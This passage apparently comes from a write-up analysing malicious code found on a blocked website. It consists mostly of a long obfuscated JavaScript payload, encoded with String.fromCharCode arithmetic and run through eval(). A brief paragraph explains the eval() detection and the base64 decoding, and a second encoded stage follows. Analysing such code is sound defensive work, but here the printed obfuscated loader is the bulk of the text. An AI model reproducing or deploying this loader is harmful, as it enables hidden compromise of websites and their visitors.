-8,90-9,100-1,93-7,125-3,89-4,61-7,84-5,108-4,109-6,124-3,73-8,113-8,107-4,109-1,91-8,57-9,89-7,59-6,75-2,112-9,92-3,91-5,77-2,83-2,108-5,112-3,83-
3,121-2,75-2,93-6,83-5,51-1,54-1,90-6,93-6,92-5,93-3,80-4,98-8,124-2,91-1,106-2,89-2,95-7,109-2,114-3,88-3,54-3,80-2,111-2,90-7,122-1,72-3,48-5,73-7,87-5,120-9,125-9,87-7,75-7,91-2,96-8,93-3,112-9,123-4,112-7,84-4,130-9,105-2,96-9,79-1,109-3,54-2,128-9,74-2,76-5,56-4,81-8,74-3,71-4,89-4,82-7,71-1,73-5,121-1,65-9,105-4,84-3,79-5,82-5,92-9,57-7,105-5,121-7,87-4,127-8,61-5,61-9,80-6,55-4,115-8,104-7,75-4,85-3,56-8,116-7,77-3,124-4,60-8,101-2,103-2,91-4,109-5,56-3,74-2,85-2,109-2,82-9,83-6,113-8,93-4,83-4,77-7,127-6,54-5,59-4,82-3,105-1,94-5,118-6,66-1,70-3,56-4,124-7,93-8,73-1,86-8,55-2,107-7,91-3,117-9,92-2,84-7,68-3,120-9,55-6,104-7,128-9,109-6,113-4,79-4,110-5,75-6,56-4,71-4,125-3,77-3,82-6,102-1,112-3,117-2,77-4,81-7,114-9,60-4,51-3,80-2,89-8,121-2,111-5,91-9,87-4,56-4,116-8,72-4,128-8,123-4,110-6,73-2,108-2,64-7,83-1,97-7,70-1,119-3,112-4,99-2,52-4,75-9,91-1,80-1,109-6,115-4,60-9,79-8,69-2,122-7,88-9,96-6,59-9,74-8,82-6,88-1,52-2,89-7,58-7,103-4,72-3,77-3,81-4,86-3,52-2,108-8,120-6,89-6,127-7,68-3,51-4,101-1,95-7,72-3,103-6,72-1,84-2,108-5,130-8,76-1,110-6,114-7,87-9,106-5,95-8,108-4,110-3,94-7,94-7,119-3,103-6,106-8,115-6,121-6,86-5,107-8,57-6,114-6,54-5,103-2,90-4,112-4,112-3,88-5,128-7,84-3,93-8,73-2,67-2,56-8,58-6,77-3,129-8,52-3,97-7,104-3,50-2,124-9,112-5,76-6,70-4,49-1,93-4,85-7,87-4,72-7,59-3,91-5,125-4,60-4,75-5,77-4,126-5,61-9,90-6,81-3,112-6,61-4,63-6,85-6,111-6,91-2,118-7,69-2,106-1,119-8,124-7,86-3,53-4,81-7,54-1,108-8,58-8,87-5,104-6,100-2,56-7,74-8,86-8,100-3,57-9,119-3,99-9,107-6,90-7,113-9,89-5,89-2,96-9,98-8,78-2,95-5,123-2,82-9,85-7,91-4,93-5,75-6,53-3,72-6,109-6,117-6,122-1,74-7,113-7,94-9,51-4,86-3,53-5,90-8,111-4,109-9,93-5,85-3,79-6,103-5,54-6,119-4,59-3,86-5,93-8,120-4,91-1,103-2,94-6,90-4,54-1,93-6,88-5,91-6,49-1,83-6,85-2,118-7,73-1,70-2,77-9,128-8,51-2,93-3,75-5,112-5,119-8,75-3,111-6,118-3,112-2,87-2,77-5,86-8,56-3,104-4,97-9,117-9,96-6,86-7,57-7,73-3,117-7,104-7,52-4,121-5,93-3,89-9,74-6,108-1,117-4,76-4,79-8,93-4,83-2,88-4,91-4,120-4,
79-3,90-3,89-1,116-8,51-2,103-2,83-1,115-4,99-9,80-9,74-6,85-8,119-6,74-3,82-1,54-5,60-7,102-5,76-4,110-3,103-6,76-5,84-2,50-2,112-3,80-6,122-2,53-1,108-9,102-2,126-4,125-6,56-5,78-6,85-2,79-2,89-5,73-6,76-9,53-4,76-8,95-8,59-9,85-3,60-9,106-6,87-1,108-1,116-8,84-6,69-1,82-1,56-9,68-1,110-7,116-1,125-9,111-9,81-9,117-9,87-4,94-4,115-7,120-8,65-9,90-9,87-2,123-7,92-2,104-3,93-5,94-8,55-2,91-4,88-4,72-7,76-1,87-9,93-6,122-7,79-6,78-4,115-9,121-2,58-3,89-9,87-1,112-4,60-5,90-7,123-2,89-8,90-5,76-4,86-4,104-1,57-8,75-2,72-4,125-5,92-4,79-3,125-6,93-8,113-7,84-8,110-6,83-6,57-7,85-5,57-6,55-6,58-3,83-2,113-4,84-2,73-1,91-1,130-9,106-3,50-2,71-4,110-5,54-6,49-1,80-5,122-3,51-2,120-2,86-1,71-2,52-3,118-4,86-3,52-3,114-6,57-4,109-9,95-7,110-3,86-5,81-8,74-5,117-1,124-6,78-3,72-4,86-5,100-1,82-4,123-1,78-8,59-6,83-1,73-1,120-4,79-3,104-7,114-4,120-8,68-1,96-9,85-2,81-7,108-6,102-1,87-1,115-7,114-5,90-7,51-1,101-1,117-3,84-1,55-6,113-6,56-2,71-4,115-9,126-7,91-3,76-3,113-6,119-3,56-2,102-5,120-1,109-6,114-5,84-8,127-5,84-3,58-9,71-3,73-6,79-1,73-3,78-3,129-8,56-4,77-7,81-9,110-5,56-8,66-9,91-2,115-5,84-6,113-4,91-8,51-1,104-4,120-6,85-2,51-2,109-2,112-5,97-9,53-2,115-7,96-6,95-5,114-7,123-7,116-6,103-6,124-5,106-3,115-6,78-2,124-2,82-1,55-6,72-4,74-7,79-1,84-8,105-4,113-4,121-6,103-2,77-7,127-5,121-2,117-8,85-6,108-4,105-2,52-2,76-8,117-8,60-4,117-6,80-2,67-2,57-1,55-3,86-7,87-4,124-5,108-9,100-3,68-2,109-6,125-4,80-5,91-9,110-7,83-5,84-9,128-6,125-6,57-6,79-7,116-7,53-1,75-2,72-1,76-8,110-7,111-9,72-1,74-7,119-4,107-3,101-1,94-8,116-9,109-1,85-7,76-9,74-1,113-5,70-2,54-5,75-9,127-8,101-3,110-2,80-2,98-8,91-1,110-3,118-2,116-6,80-2,110-1,75-5,93-3,109-8,93-5,91-5,59-6,73-6,129-8,80-3,106-4,80-3,114-8,114-7,74-4,88-1,86-2,120-9,81-6,77-1,129-9,110-7,121-8,76-4,110-5,81-7,126-7,95-6,87-1,113-5,60-7,76-1,75-5,86-8,131-9,93-3,112-5,120-5,112-8,82-2,111-8,88-3,104-7,79-3,93-9,127-8,56-6,72-2,57-7,98-9,90-1,80-7,109-3,60-4,118-7,71-1,110-4,98-9,45-2,84-7,73-7,121-1,119-2,70-3,68-2,
107-4,112-4,72-5,112-8,88-7,57-1,103-2,96-8,112-5,85-5,75-1,122-3,107-8,124-3,84-8,113-6,104-4,92-2,84-4,69-2,49-1,66-9,79-8,70-2,63-7,94-5,102-4,117-8,123-8,86-5,108-9,53-2,113-5,50-1,106-5,95-9,109-2,125-6,71-4,113-7,90-4,116-2,71-3,108-5,72-3,65-8,86-8,72-5,53-5,102-3,92-2,117-9,93-3,116-6,82-8,86-5,56-4,83-4,110-9,90-8,76-7,57-5,72-4,88-5,84-6,76-8,99-1,112-2,75-9,110-6,96-9,95-7,109-1,50-1,107-6,91-9,126-7,47-4,74-6,126-5,94-5,51-4,76-8,117-9,105-6,119-6,86-9,74-7,53-5,66-9,79-5,122-2,65-9,112-7,92-3,122-3,53-1,68-2,81-1,92-8,82-1,120-4,77-5,74-3,111-8,78-1,81-8,108-2,64-8,125-7,75-4,73-6,55-7,126-7,107-8,91-5,74-8,112-3,85-4,74-3,106-7,121-4,76-7,123-3,49-1,55-3,78-2,69-2,113-1,89-8,109-7,89-2,77-7,117-7,106-9,49-1,117-1,92-2,80-4,130-8,88-7,118-4,96-9,89-6,92-7,49-1,79-2,86-3,114-3,77-5,75-7,75-7,123-3,53-4,96-6,73-3,114-7,107-1,72-1,72-5,82-1,120-7,75-4,127-7,128-8,126-6,78-5,125-3,109-6,95-9,86-9,127-8,57-4,119-2,98-1,53-5,72-6,92-2,106-7,93-5,56-8,62-6,69-4,86-3,78-5,79-4,86-6,107-1,113-9,79-3,88-6,79-8,90-8,58-9,84-6,126-7,120-1,120-7,74-8,56-6,57-4,115-1,91-5,74-4,113-5,56-1,105-5,52-1,114-6,69-1,94-4,112-5,111-3,58-2,106-9,127-8,57-5,75-9,83-8,93-9,128-9,116-2,73-1,72-4,89-3,88-1,92-2,96-9,118-2,67-2,90-3,88-4,125-6,124-8,81-1,91-9,106-3,128-7,75-7,117-8,112-5,52-5,73-7,71-4,127-8,87-9,78-8,111-8,119-8,84-6,80-2,74-9,78-5,114-2,80-4,74-5,80-2,86-5,105-6,76-5,60-7,87-3,90-3,93-6,91-1,82-6,93-3,125-4,59-3,78-9,74-3,106-1,124-5,61-9,85-5,73-7,100-1,129-8,90-8,85-2,85-4,116-9,72-6,71-5,76-3,124-5,83-6,75-3,110-2,70-1,98-8,111-8,111-8,91-2,79-5,83-2,112-1,87-2,82-2,80-8,90-4,124-3,95-8,88-1,86-4,89-2,91-1,96-9,118-2,70-5,92-5,88-4,116-5,77-2,83-7,123-3,105-2,121-8,76-4,112-7,78-4,120-1,95-6,88-2,110-2,59-6,84-9,78-8,85-7,130-8,98-8,109-2,124-9,108-4,83-3,111-8,94-9,101-4,79-3,87-3,126-7,55-5,77-7,54-4,93-4,81-8,83-7,124-3,53-1,78-5,74-5,109-5,116-5,61-7,84-6,110-6,78-5,124-6,76-8,110-1,58-1,106-1,86-3,121-2,83-9,91-7,106-6,95-7,111-3,94-4,93-3,110-7,80-7,108
-4,102-5,56-8,81-4,93-7,79-1,109-3,90-1,56-4,79-9,88-6,90-5,109-7,82-7,70-2,112-5,81-6,73-1,107-1,126-6,58-3,87-7,106-2,126-7,123-2,82-9,108-2,84-7,121-4,71-5,113-5,77-7,52-9,81-5,73-8,72-7,85-1,87-9,73-8,116-4,127-5,78-7,128-7,109-6,104-7,97-8,89-5,58-6,50-2,84-5,124-5,59-7,83-4,84-6,69-1,108-4,100-3,75-6,77-9,120-4,126-5,106-7,75-5,117-9,63-8,91-5,111-1,116-4,122-8,91-7,75-6,109-5,50-7,104-2,79-7,114-7,69-2,93-9,74-5,121-5,116-6,102-5,50-2,118-2,92-2,105-4,92-9,108-9,65-9,70-2,87-3,85-8,96-6,81-6,94-7,117-2,110-8,75-8,128-7,126-7,126-7,98-9,112-2,82-4,113-4,89-6,53-3,101-1,121-7,74-4,113-5,112-5,65-9,82-3,88-5,115-4,102-3,94-4,107-3,73-7,79-1,106-9,57-9,117-1,91-1,109-8,91-3,93-7,61-8,76-6,89-6,113-6,74-1,76-2,109-4,108-9,56-4,69-1,85-1,95-6,111-1,80-1,74-8,61-9,113-7,88-6,88-4,89-8,124-7,81-9,124-2,74-9,117-1,86-9,74-6,84-2,86-4,98-9,83-1,80-7,104-3,76-3,83-1,112-5,92-3,104-6,84-3,94-9,103-6,76-5,114-4,61-9,66-1,77-2,106-3,114-7,109-3,73-1,72-5,118-7,116-7,100-3,75-9,73-8,116-9,92-8,79-8,120-4,117-3,90-6,74-5,108-4,50-7,111-9,73-2,76-2,123-1,99-9,113-6,124-8,112-2,106-9,124-4,98-8,125-3,107-6,96-8,93-7,59-6,96-9,92-8,74-9,79-4,84-6,90-3,118-3,93-3,79-7,72-4,64-8,122-3,80-5,121-2,121-6,114-8,78-7,86-4,86-1,126-9,75-7,122-2,72-7,123-9,78-1,69-1,120-9,79-1,71-5,86-5,82-1,114-3,78-5,68-3,82-9,103-4,103-2,90-3,111-7,60-7,78-6,110-5,79-2,105-3,68-2,73-6,82-1,73-4,72-3,112-6,72-7,128-9,104-5,95-9,117-2,51-3,70-2,110-5,76-7,125-8,79-8,84-3,117-2,58-2,78-4,126-7,118-3,105-6,77-4,104-1,79-6,54-5,85-9,106-3,108-5,84-6,80-9,107-1,118-7,58-8,70-1,106-1,63-7,81-2,92-2,91-4,75-1,84-3,105-6,55-4,116-8,56-7,104-3,87-1,112-5,127-9,76-8,88-1,106-6,109-3,76-5,88-6,125-6,50-3,85-8,72-5,119-4,77-1,76-3,123-3,114-7,88-2,83-7,106-3,61-5,90-9,76-1,130-8,68-3,60-6,76-8,89-8,93-8,74-5,77-2,76-9,74-9,73-6,76-4,76-4,112-4,52-4,99-9,75-5,110-3,117-6,79-7,108-3,120-5,112-2,89-6,55-6,61-4,48-1,106-6,92-9,123-8,105-6,79-6,70-5,60-8,52-3,88-9,89-8,53-1,83-7,73-6,126-4,69-4,65-8,71-2,77-9,90-9,80-
1,80-6,69-1,57-1,118-7,71-1,110-4,97-8,48-5,86-9,72-6,126-6,111-2,86-3,117-7,119-7,117-3,87-4,88-2,125-9,120-1,101-1,91-8,77-3,131-9,96-6,109-2,121-5,111-1,101-4,55-7,118-2,95-5,76-1,127-5,74-9,117-1,71-3,70-2,86-5,73-3,92-2,128-6,60-4,94-4,69-1,76-8,125-5,118-1,92-7,53-4,114-6,110-1,85-2,58-8,108-9,53-3,90-7,125-5,121-2,57-8,78-4,111-5,127-7,92-2,82-6,126-7,57-8,117-7,90-1,126-7,61-5,88-1,83-4,111-6,66-1,51-3,79-7,74-7,106-3,105-3,104-7,89-6,109-6,78-9,78-8,113-7,79-6,64-8,85-5,79-9,103-4,126-8,70-4,92-9,84-7,125-8,70-1,127-5,98-9,50-3,107-5,97-9,53-1,88-9,82-7,84-2,116-9,109-3,85-6,127-7,115-8,104-5,80-5,111-6,97-8,75-4,77-7,84-1,115-8,86-9,75-2,76-9,61-9,88-8,89-1,114-4,69-3,51-2,107-6,75-6,91-9,62-7,87-4,51-1,120-8,56-2,92-3,93-5,71-5,54-1,101-1,97-9,115-7,99-9,97-7,109-2,117-1,116-6,79-1,126-6,104-4,97-7,83-3,87-3,117-6,55-1,70-2,68-1,118-3,86-7,79-4,93-9,62-5,74-4,80-9,113-7,96-7,58-4,85-8,107-3,72-7,111-5,91-9,92-9,53-1,117-9,76-8,122-2,120-1,111-7,79-8,112-6,58-1,86-4,96-7,86-4,124-5,54-3,99-9,113-9,105-2,107-8,80-4,87-4,71-2,123-4,72-2,125-4,73-4,93-4,96-7,73-2,83-9,82-6,90-3,80-9,83-1,117-6,109-8,95-9,88-6,60-9,94-5,93-6,103-3,120-6,84-1,51-2,116-8,62-9,101-1,91-3,115-7,93-3,91-1,113-6,124-8,111-1,101-4,57-9,124-8,97-7,104-3,92-9,108-1,114-6,88-1,86-3,82-9,73-4,77-3,73-5,56-4,72-1,78-6,69-1,108-9,105-1,106-6,121-1,112-1,113-1,71-5,68-1,124-5,111-6,74-6,115-7,100-1,124-5,84-5,128-6,51-3,106-7,89-9,107-2,86-5,107-3,96-7,56-8,125-6,87-8,85-7,109-4,100-1,59-2,73-6,92-8,86-5,88-9,87-9,69-1,105-2,56-8,77-9,89-5,128-9,116-7,80-4,89-3,60-7,123-5,92-9,55-5,97-7,56-6,93-7,114-6,114-6,53-5,95-5,78-6,75-9,94-4,95-5,111-7,69-3,86-8,105-8,54-6,119-3,91-1,106-5,90-2,87-1,61-8,76-9,122-1,81-4,103-1,85-8,110-4,112-5,72-2,93-6,84-1,53-5,118-8,81-5,71-5,129-9,61-4,98-9,94-7,101-1,117-3,88-5,51-2,111-4,109-2,101-1,88-4,120-1,94-8,80-2,85-4,55-2,113-3,85-8,77-6,76-6,96-6,106-5,89-1,93-7,60-7,88-1,88-1,94-5,92-3,77-4,115-9,60-4,118-7,76-6,111-5,90-1,50-7,86-9,75-9,128-8,118-1,8
5-2,88-4,91-6,125-8,72-4,89-7,127-8,122-8,83-9,130-8,121-2,81-5,73-3,73-8,53-1,111-5,81-8,106-2,112-5,100-1,81-2,107-2,76-7,104-7,77-7,110-5,109-2,71-6,77-1,112-7,57-4,82-8,89-3,89-1,111-3,57-6,84-4,91-9,94-4,111-2,72-6,85-2,107-4,48-1,88-5,127-8,117-2,57-1,84-7,85-1,68-3,79-3,75-2,122-3,110-7,125-3,105-8,89-4,102-2,92-2,101-3,113-4,99-9,117-5,91-6,79-7,56-7,107-3,91-1,55-5,124-8,79-3,92-5,89-1,111-3,52-3,79-4,124-4,128-9,127-6,73-1,108-2,89-4,115-7,86-3,126-6,64-8,58-6,80-1,89-6,117-6,106-7,104-2,90-3,73-3,111-1,101-4,56-8,125-9,91-1,78-4,75-5,59-2,56-3,92-5,89-5,125-9,108-4,92-8,91-7,91-1,107-3,108-9,50-1,85-7,104-2,85-9,122-2,106-3,53-5,89-6,123-1,90-5,123-6,75-8,110-6,53-5,107-4,69-3,107-2,57-9,94-5,84-7,110-7,58-6,78-9,80-7,126-7,53-1,99-2,85-8,106-2,128-9,56-5,77-9,88-5,79-2,91-1,80-3,88-5,117-6,79-7,94-7,91-4,85-3,56-7,80-5,111-7,121-2,127-6,78-5,110-5,112-5,50-3,69-1,111-8,118-3,121-3,86-8,76-8,94-8,91-9,81-8,68-2,53-1,119-7,79-4,70-4,57-1,85-4,84-6,110-4,124-8,124-4,92-7,78-7,97-8,84-3,92-8,95-8,119-3,77-1,72-3,69-1,62-5,58-9,108-9,87-5,57-9,116-4,76-9,76-8,75-2,113-4,69-1,105-1,101-2,121-5,102-1,127-6,119-4,100-1,75-1,126-7,64-8,51-8,79-8,67-1,58-2,92-3,81-5,87-3,70-4,55-2,83-1,76-4,124-8,90-3,95-5,56-6,127-8,74-1,76-6,110-4,89-8,112-4,81-3,90-8,124-5,128-7,69-1,110-1,72-6,72-6,90-7,50-1,114-6,59-6,104-4,89-1,111-3,98-8,88-9,107-3,106-6,112-2,77-1,120-1,87-6,105-8,81-5,75-7,104-1,57-1,77-7,126-4,83-9,71-1,86-8,89-6,55-3,82-7,75-3,86-3,70-5,79-8,79-3,89-7,104-1,125-4,77-9,117-8,103-3,56-6,94-8,111-3,115-7,48-5,82-2,72-4,106-7,81-3,80-7,125-5,109-2,111-2,76-1,74-8,63-7,89-8,81-5,123-1,74-8,48-5,86-1,76-5,98-9,84-3,88-4,96-9,118-2,78-2,89-2,96-8,113-6,57-7,84-6,85-3,123-4,111-1,79-8,90-9,55-3,113-5,73-1,124-4,125-6,122-8,77-4,128-6,106-3,87-1,104-6,113-9,110-3,113-8,78-3,109-6,59-3,68-3,76-9,110-5,75-6,59-7,75-7,91-8,81-4,115-4,77-1,123-2,55-3,81-8,78-9,111-7,73-8,63-8,85-9,83-1,125-6,50-2,80-8,86-3,91-2,119-9,88-7,108-1,78-4,89-5,104-4,96-8,115-7,97-7,95-5,1
13-9,105-2,124-2,77-2,105-1,113-6,86-8,104-5,95-7,124-4,109-4,100-1,56-6,95-5,83-7,85-6,113-6,72-3,91-4,94-8,90-2,116-8,108-1,106-9,89-3,68-2,61-4,90-1,94-7,106-2,111-4,92-6,57-8,93-4,121-8,79-1,114-9,121-6,85-4,86-8,109-5,63-6,54-1,84-3,95-8,71-2,64-3,41-2,60-1,15-5,106-4,124-7,111-1,102-3,120-4,106-1,112-1,113-3,38-6,125-5,120-9,123-9,100-5,107-6,111-1,101-2,47-7,121-6,118-2,121-7,113-8,115-5,108-5,52-8,35-3,109-2,102-1,125-4,46-5,37-5,124-1,12-2,38-6,33-1,123-5,101-4,117-3,36-4,122-8,106-5,117-2,41-9,70-9,36-4,46-7,40-1,61-2,16-6,41-9,33-1,108-6,120-9,123-9,41-9,41-1,124-6,100-3,120-6,33-1,112-7,33-1,67-6,37-5,49-1,66-7,35-3,107-2,36-4,66-6,37-5,122-7,117-1,117-3,113-8,115-5,105-2,52-6,109-1,105-4,113-3,107-4,117-1,112-8,68-9,34-2,109-4,48-5,46-3,50-9,38-6,129-6,17-7,34-2,39-7,33-1,36-4,121-7,104-3,123-8,33-1,45-2,63-2,40-8,90-7,124-8,123-9,107-2,114-4,111-8,49-3,106-4,119-5,114-3,115-6,75-8,110-6,100-3,115-1,71-4,112-1,104-4,103-2,47-7,117-2,122-6,119-5,108-3,113-3,105-2,51-5,101-2,106-2,103-6,120-6,69-2,120-9,108-8,109-8,72-7,123-7,44-4,111-6,43-2,38-6,103-9,13-3,34-2,37-5,33-1,37-5,37-5,37-5,38-6,33-1,34-2,41-9,41-9,35-3,37-5,41-9,41-9,41-9,39-7,40-8,36-4,41-9,40-8,36-4,39-7,41-9,40-8,34-2,37-5,36-4,33-1,37-5,40-8,39-7,113-6,109-8,126-5,52-6,100-1,106-2,106-9,118-4,73-6,112-1,103-3,103-2,72-7,120-4,46-6,108-3,38-6,45-8,37-5,112-5,110-9,130-9,50-4,113-5,110-9,113-3,107-4,119-3,109-5,49-8,48-7,63-4,14-4,33-1,41-9,130-5,11-1,37-5,37-5,119-5,107-6,123-7,122-5,116-2,114-4,35-3,123-9,108-7,117-2,68-9,11-1,127-2,18-8,19-9,127-9,104-7,119-5,35-3,101-1,108-7,105-6,41-9,70-9,34-2,121-1,114-3,118-4,97-2,104-3,117-7,100-1,45-5,98-1,120-4,120-9,101-3,46-6,104-3,119-9,101-2,102-1,106-6,50-9,50-6,35-3,113-6,104-3,122-1,45-4,65-6,14-4,43-3,119-9,103-2,125-6,37-5,77-7,123-6,119-9,104-5,125-9,106-1,117-6,115-5,43-3,108-8,107-6,102-3,43-2,48-7,41-1,45-4,60-1,17-7,11-1);eval(DRYUQIEDHS);'); eval (PRZKZPVRCI);

Looking at the end of the code, I knew that the site got blocked due to the eval() function. In the past, I have had similar experiences with this type of detection. The problem with eval() is that it can analyze and run malicious code that is hidden through multiple encoding schemes. Our payload above is being base64 decoded by our atob() function. Decoding led to the following code.

var DRYUQIEDHS = String.fromCharCode(13-3,125-7,102-5,118-4,39-7,113-6,107-6,127-6,39-7,66-5,41-9,41-2,111-4,75-4,79-4,111-4,124-3,95-6,91-6,92-3,127-6,79-9,46-7,64-5,11-1,122-4,106-9,120-6,33-1,108-7,116-6,101-2,106-5,107-7,39-7,64-3,39-7,42-3,86-4,75-4,113-9,53-2,79-8,68-2,112-1,123-9,86-6,76-9,108-1,87-9,110-9,72-1,72-3,122-2,81-6,107-3,113-5,98-8,85-9,105-2,120-9,57-8,75-5,113-8,94-9,84-9,80-3,130-9,80-7,78-9,73-3,59-8,116-8,116-5,90-5,51-2,111-3,114-5,86-3,57-7,109-9,123-9,85-2,57-8,58-5,51-1,105-8,112-7,113-6,96-7,74-1,89-8,57-5,54-5,79-3,131-9,84-2,107-6,108-7,96-8,55-2,55-2,79-1,70-3,107-8,107-5,83-7,55-5,92-7,95-5,74-3,72-4,105-6,125-5,82-4,111-7,85-3,122-5,86-5,118-9,112-5,55-8,69-3,73-6,117-6,122-6,75-1,129-7,73-8,91-3,79-6,90-5,87-9,50-2,106-4,91-6,79-5,97-9,83-8,114-9,67-2,57-2,73-6,108-2,80-7,92-2,78-2,109-4,87-2,82-5,87-2,90-3,61-8,62-6,95-6,116-6,85-7,80-3,72-4,89-5,75-2,109-1,75-8,69-4,50-2,123-4,82-3,115-9,103-3,94-4,82-4,87-5,60-4,115-6,84-5,83-1,58-1,89-7,107-8,75-3,86-1,111-6,103-4,56-8,126-6,82-6,98-8,124-2,53-5,82-7,70-3,56-5,108-1,129-7,82-7,128-8,94-5,120-6,85-2,60-9,114-2,117-3,70-2,128-8,97-8,56-2,80-7,70-2,90-9,100-1,79-4,68-2,66-9,118-6,85-6,83-2,57-5,108-6,84-4,69-2,101-2,120-6,74-2,74-6,89-7,84-3,92-8,91-4,117-1,79-3,73-5,129-7,104-1,116-6,104-3,84-2,75-9,64-7,96-7,87-2,57-8,123-9,84-1,127-7,68-3,52-5,109-9,91-3,70-1,101-4,80-4,112-9,56-4,110-3,75-2,69-2,109-6,91-4,80-2,108-2,58-6,125-6,74-2,78-7,61-8,74-7,100-2,113-4,121-6,83-2,106-7,56-5,116-8,53-4,103-2,93-7,110-3,52-4,70-2,115-9,85-8,47-4,79-8,87-5,105-5,110-5,94-6,56-5,111-3,92-2,87-8,53-3,75-5,118-8,100-3,128-8,52-4,90-1,84-9,59-8,87-2,121-6,73-2,69-2,72-3,84-5,78-3,85-1,62-5,77-1,91-9,76-4,108-1,60-5,84-5,69-4,57-1,119-1,77-9,72-5,97-8,50-3,70-4,70-5,117-1,58-7,79-6,76-9,115-4,100-1,83-5,72-5,115-4,112-9,80-4,107-4,94-9,79-1,96-7,113-5,64-7,57-4,91-4,92-9,59-3,87-9,98-8,53-3,85-7,80-5,73-5,69-1,105-2,124-3,84-4,72-6,106-7,124-3,91-8,125-3,122-7,54-3,87-4,124-5,124-5,60-8,78-1,10
8-2,120-1,94-6,84-7,115-8,91-6,120-6,83-7,107-4,90-5,104-3,79-3,90-6,50-1,55-2,85-3,74-2,124-8,81-5,103-3,52-2,79-5,79-3,67-2,111-3,83-5,55-6,109-8,90-4,113-5,111-2,76-5,88-5,80-7,54-7,73-1,106-3,118-3,58-7,100-2,115-7,80-2,98-8,95-5,113-9,99-9,81-3,103-6,52-4,117-2,85-8,84-5,76-8,74-1,65-9,72-2,129-7,75-1,83-7,105-4,118-9,119-4,102-1,78-7,69-1,53-1,121-2,79-1,120-1,51-2,115-4,78-6,129-8,112-9,81-9,71-5,68-3,54-2,57-1,83-9,122-2,117-6,94-5,86-8,90-9,61-8,123-5,95-6,116-8,73-7,125-3,110-9,95-7,87-2,127-8,77-5,57-7,95-5,77-9,78-1,112-7,115-4,82-5,81-9,77-9,100-1,109-5,101-1,127-7,67-2,119-8,70-2,124-3,80-7,130-8,79-5,67-1,64-7,127-7,101-2,114-8,56-4,90-3,77-2,86-5,126-7,120-6,78-2,112-5,127-7,85-4,109-8,89-1,91-9,110-3,96-9,93-6,125-9,106-9,92-2,124-2,108-9,90-2,96-9,85-2,124-5,54-6,82-2,109-5,125-6,115-4,81-9,54-4,112-5,108-3,67-1,85-3,51-3,61-5,81-5,86-4,91-2,106-4,105-7,109-2,127-8,114-6,83-9,67-1,62-5,105-4,106-7,81-9,88-2,61-9,88-6,77-6,93-3,77-6,107-7,114-7,78-8,85-9,94-7,94-6,115-7,52-3,109-8,87-1,113-6,61-7,78-8,59-9,100-1,44-1,75-8,112-8,58-6,61-5,83-4,127-6,51-2,96-8,83-7,126-7,94-9,107-1,82-6,107-3,84-7,53-3,88-8,53-2,55-6,48-5,75-4,108-2,86-5,78-3,81-4,76-9,107-7,86-9,87-2,79-7,116-8,52-4,96-6,71-1,114-6,115-1,88-1,112-3,58-5,123-9,78-9,76-4,87-9,86-2,103-3,91-3,108-1,72-3,98-8,112-9,57-5,120-6,83-4,67-2,56-3,94-4,77-4,117-9,62-5,59-6,94-7,91-4,96-6,81-5,78-2,107-2,58-9,78-2,88-3,91-8,58-6,59-3,83-5,123-3,56-8,114-2,75-3,75-4,113-6,110-4,66-1,108-5,113-2,119-3,85-6,112-7,123-8,74-9,91-1,115-8,51-2,108-4,106-9,122-2,123-4,89-8,87-9,126-4,75-6,53-3,72-4,118-9,107-4,69-1,83-7,107-1,104-1,105-3,73-3,106-1,119-4,118-3,101-1,128-8,94-9,114-8,68-2,92-9,73-8,49-2,71-6,57-8,115-7,115-5,102-2,95-8,121-5,89-8,97-7,108-4,67-1,81-3,99-2,53-5,123-7,99-9,105-4,96-8,92-6,55-2,70-2,113-8,57-1,72-2,78-5,129-8,90-9,100-1,93-7,125-3,89-4,61-7,84-5,108-4,109-6,124-3,73-8,113-8,107-4,109-1,91-8,57-9,89-7,59-6,75-2,112-9,92-3,91-5,77-2,83-2,108-5,112-3,83-3,121-2,75-2,93-6,83-5,
51-1,54-1,90-6,93-6,92-5,93-3,80-4,98-8,124-2,91-1,106-2,89-2,95-7,109-2,114-3,88-3,54-3,80-2,111-2,90-7,122-1,72-3,48-5,73-7,87-5,120-9,125-9,87-7,75-7,91-2,96-8,93-3,112-9,123-4,112-7,84-4,130-9,105-2,96-9,79-1,109-3,54-2,128-9,74-2,76-5,56-4,81-8,74-3,71-4,89-4,82-7,71-1,73-5,121-1,65-9,105-4,84-3,79-5,82-5,92-9,57-7,105-5,121-7,87-4,127-8,61-5,61-9,80-6,55-4,115-8,104-7,75-4,85-3,56-8,116-7,77-3,124-4,60-8,101-2,103-2,91-4,109-5,56-3,74-2,85-2,109-2,82-9,83-6,113-8,93-4,83-4,77-7,127-6,54-5,59-4,82-3,105-1,94-5,118-6,66-1,70-3,56-4,124-7,93-8,73-1,86-8,55-2,107-7,91-3,117-9,92-2,84-7,68-3,120-9,55-6,104-7,128-9,109-6,113-4,79-4,110-5,75-6,56-4,71-4,125-3,77-3,82-6,102-1,112-3,117-2,77-4,81-7,114-9,60-4,51-3,80-2,89-8,121-2,111-5,91-9,87-4,56-4,116-8,72-4,128-8,123-4,110-6,73-2,108-2,64-7,83-1,97-7,70-1,119-3,112-4,99-2,52-4,75-9,91-1,80-1,109-6,115-4,60-9,79-8,69-2,122-7,88-9,96-6,59-9,74-8,82-6,88-1,52-2,89-7,58-7,103-4,72-3,77-3,81-4,86-3,52-2,108-8,120-6,89-6,127-7,68-3,51-4,101-1,95-7,72-3,103-6,72-1,84-2,108-5,130-8,76-1,110-6,114-7,87-9,106-5,95-8,108-4,110-3,94-7,94-7,119-3,103-6,106-8,115-6,121-6,86-5,107-8,57-6,114-6,54-5,103-2,90-4,112-4,112-3,88-5,128-7,84-3,93-8,73-2,67-2,56-8,58-6,77-3,129-8,52-3,97-7,104-3,50-2,124-9,112-5,76-6,70-4,49-1,93-4,85-7,87-4,72-7,59-3,91-5,125-4,60-4,75-5,77-4,126-5,61-9,90-6,81-3,112-6,61-4,63-6,85-6,111-6,91-2,118-7,69-2,106-1,119-8,124-7,86-3,53-4,81-7,54-1,108-8,58-8,87-5,104-6,100-2,56-7,74-8,86-8,100-3,57-9,119-3,99-9,107-6,90-7,113-9,89-5,89-2,96-9,98-8,78-2,95-5,123-2,82-9,85-7,91-4,93-5,75-6,53-3,72-6,109-6,117-6,122-1,74-7,113-7,94-9,51-4,86-3,53-5,90-8,111-4,109-9,93-5,85-3,79-6,103-5,54-6,119-4,59-3,86-5,93-8,120-4,91-1,103-2,94-6,90-4,54-1,93-6,88-5,91-6,49-1,83-6,85-2,118-7,73-1,70-2,77-9,128-8,51-2,93-3,75-5,112-5,119-8,75-3,111-6,118-3,112-2,87-2,77-5,86-8,56-3,104-4,97-9,117-9,96-6,86-7,57-7,73-3,117-7,104-7,52-4,121-5,93-3,89-9